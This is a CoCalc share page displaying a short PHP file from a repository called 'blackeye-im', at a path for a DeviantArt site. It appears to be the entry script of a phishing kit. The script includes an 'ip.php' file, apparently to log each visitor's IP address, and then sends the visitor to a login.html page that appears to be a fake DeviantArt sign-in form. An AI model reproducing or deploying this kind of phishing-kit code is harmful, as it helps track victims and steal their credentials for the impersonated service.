Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
thewickedkarma
GitHub Repository: thewickedkarma/blackeye-im
Path: blob/master/sites/devianart/index.php
777 views
1
<?php
2
include 'ip.php';
3
header('Location: login.html');
4
exit
5
?>
6
7